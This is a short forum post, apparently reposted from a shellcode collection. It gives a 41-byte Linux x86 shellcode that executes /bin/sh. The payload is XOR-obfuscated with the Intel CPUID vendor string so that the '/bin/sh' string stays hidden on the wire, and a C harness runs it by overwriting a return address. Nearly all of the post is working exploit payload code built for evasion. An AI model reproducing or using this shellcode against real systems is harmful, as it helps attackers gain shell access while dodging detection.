linux/x86 execve /bin/sh xored for Intel x86 CPUID 41 bytes
文章作者:izik[code]/*
* (linux/x86) execve("/bin/sh", ["/bin/sh"], NULL) / xor'ed against Intel x86 CPUID - 41 bytes
*
* The idea behind this shellcode is to use a *weak* pre-shared secret between the attacker and
* the attacked machine. So if a 3rd party side would try to run this shellcode and would produce
* a different CPUID output (e.g. different arch) the shellcode won't work. In addition this also
* prevents from having the '/bin/sh' string visible on the wire.
*
* The shellcode key is (0x6c65746e, 'letn') and expected to be in %ecx register after CPUID
*
* - izik <[email]izik@tty64.org[/email]>
*/
char shellcode[] =
"\x31\xc0" // xor %eax,%eax
"\x0f\xa2" // cpuid
"\x51" // push %ecx
"\x68\xe7\x95\xa8\xec" // push $0xeca895e7
"\x68\xde\x7f\x37\x3f" // push $0x3f377fde
"\x68\x07\x1a\xec\x8f" // push $0x8fec1a07
"\x68\x6e\x1c\x4a\x0e" // push $0x0e4a1c6e
"\x68\x06\x5b\x16\x04" // push $0x04165b06
//
// <_unpack_loop>:
//
"\x31\x0c\x24" // xor %ecx,(%esp)
"\x5a" // pop %edx
"\x75\xfa" // jne <_unpack_loop>
"\x83\xec\x18" // sub $0x18,%esp
"\x54" // push %esp
"\xc3"; // ret
int main(int argc, char **argv) {
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int) shellcode;
}[/code]
页:
[1]